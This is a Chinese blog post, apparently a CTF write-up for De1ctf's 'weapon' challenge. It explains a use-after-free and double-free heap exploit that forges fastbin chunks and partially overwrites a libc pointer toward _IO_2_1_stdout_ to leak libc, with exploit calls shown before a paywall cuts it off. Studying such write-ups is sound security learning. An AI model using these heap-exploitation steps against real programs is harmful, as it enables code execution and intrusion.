De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup

最新推荐文章于 2024-08-19 15:11:00 发布
最新推荐文章于 2024-08-19 15:11:00 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 学习日记 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42151611/article/details/99228675
版权
本文详细解析了De1ctf比赛中通过_IO_2_1_stdout_泄露libc地址的攻击过程,涉及create、delete和rename操作的漏洞分析,以及利用fastbin链表和double free漏洞实现getshell的完整exploit步骤。
摘要由CSDN通过智能技术生成

GitHub

例行公事


可以看出保护全开

进行分析

可以发现程序功能很简单

  1. create
  2. delete
  3. rename
create

限定大小最大只能是0x60
在这里插入图片描述
index只能是0-9但是是自个输入的

存在一个结构,struct[0] = size,struct[1] = ptr

readn函数没有用\x00截断

delete

中间index的判断有问题,且存在uaf

rename

根据之前存储的size和ptr进行读取

利用方法
  1. 申请多个块,且在块中构造块
	create(0x10,0,p64(0)+p64(0x41))
	create(0x60,1,'a'*0x20+p64(0)+p64(0x41))
	create(0x30,2,'a')
	create(0x30,3,'a')
	create(0x30,4,'a')
  1. 因为要利用uaf漏洞,所以要让块进入fastbin链表,且0x60的块也必须进入fastbin链表,为了之后的利用
	delete(1)
	delete(2)
	delete(3)
  1. 利用idx为3的块的指针,分配块到我们构造的假块上,修改idx为1的块的size,再次将其free,这时候idx为1的块在fastbin的0x60的链表中,同时也在unsorted bin的链表中,因此其fd与bk都存放着libc的地址
	rename(3,'\x10')
	create(0x30,3,'a')
	create(0x30,2,p64(0))
	rename(2,p64(0)+p64(0xb1))
	delete(1)	#为了让这一步顺利,要绕过prev_inuse(nextchunk) == 1,所以块的大小要构造好
  1. 再把块的size改回来,同时将libc地址的最低两字节覆盖成_IO_2_1_stdout_附近的地址,该地址存在一个size为0x7f的块,同时该块的data与足以覆盖我们想要覆盖的结构
	rename(2,p64(0)+p64(0x71))
	rename(1,'\xdd\xa5')	#因为只有低三位是确定的,这一步需要运气,成功的机率为1/16
	create(0x60
最低0.47元/天 解锁文章
哒君
关注
专栏目录
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2135
realloc好题
好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc
hollk’s blog
02-19 5516
前言 这道题是wiki上tcache attack部分的第二道例题,原题在wiki那个题包里,需要自己找一下,忘记在哪了。。。。。其实个人感觉这道题的考点并不是tcache attack,而是在于IO_FILE的利用。因为这道题与以往所见并不太相同,并没有输出函数,也就意味着无法通过往常的方式利用程序自身的输出函数进行泄露内存地址,所以这时候就需要利用IO_FILE的方式进行输出(我也是第一次遇到,肝了好几天)。这篇文章主要分为两个部分,前半部分主要讲解IO_FILE泄露libc的方式,后半部分是HITCO
重学IO:利用_IO_2_1_stdout泄露libc
最新发布
2301_79327647的博客
08-19 857
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35。
【八芒星计划】 劫持_IO_2_1_stdout_泄露libc
carol2358的博客
09-02 1106
这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单 文章目录CISCN2020 easyboxsmaj CISCN2020 easyboxs libc2.23 off by one+劫持_IO_2_1_stdout_ 有add和free add(0, 0x18, 'a') add(1, 0xf8, 'a') add(2, 0x68, 'a'
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 768
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 410
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
DE1_i2sound.rar_ALTERA DE1_DE1 音乐_de1_de1_i2sound
09-23
DE1_i2sound.rar 是一个针对Altera DE1开发板的资源包,主要目标是实现通过DE1平台播放音乐的功能。这个压缩包包含了与DE1开发板上的I2S(Inter-IC Sound)接口相关的软件、硬件设计以及可能的教程资料,帮助用户...
DE1_SoC.zip_DE1_SoC_assignment_de1-soc_verilog
09-24
DE1_SoC.zip_DE1_SoC_assignment_de1-soc_verilog是一个关于DE1_SoC开发板的Verilog引脚分配项目的压缩文件。这个项目主要涉及的是在硬件描述语言Verilog中对DE1_SoC开发板的引脚进行适当地配置和分配。DE1_SoC是一...
De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1161
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps
09-21
标题 "My_First_HPS.rar_DE1 SOC_SOC_de1 hps_de1-soc_my_first_hps" 暗示了这是一个关于DE1-SOC开发板上实现的"My First HPS"项目,其中HPS代表Hard Processor System(硬处理器系统)。这个项目可能是针对初学者...
house of botcake利用模板+爆破stdout泄露地址 glibc2.31
FUCKING12的博客
11-06 204
【代码】house of botcake利用模板+爆破stdout泄露地址
新姿势GET 通过unsorted bin泄露libc地址 与 fastbin double free
哒君的博客
08-01 2076
源文件 GitHub checksec 初步分析 利用方法 用sentence函数分配small bin大小的bin,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字...
Magic_Book(stdout泄露地址
FUCKING12的博客
11-03 218
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址和堆地址,我们可以利用这2个残余地址来爆破stdout。首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。因为我们没有show函数无法泄露地址,所以我们需要打stdout泄露地址
CTF泄漏libc基址的方法
liucc09的博客
01-05 4079
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
HITCON 2018 baby_tcache学习(以及_IO_FILE泄露libc基础)
a2590035252的博客
10-08 329
IO_FILE漏洞利用基础中的基础中的基础
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 284
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
De1CTF weapon 经验总结
qq_43189757的博客
10-04 788
第一次接触通过利用_IO_2_1_stdout_ 来泄露libc地址的题目,中间碰到不少问题,在这里记录一下 1.泄露libc 由于程序限制了创建的堆块大小为0x60 以内,所以无法同通过创建一个大小能放入unsortedbin中的堆块,但是可以通过伪造一个大小符合unsortedbin中的堆块来泄露libc地址 具体步骤: 1.创建五个大小为0x20堆块 编号依次为0-5, 之后一次释放chun...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值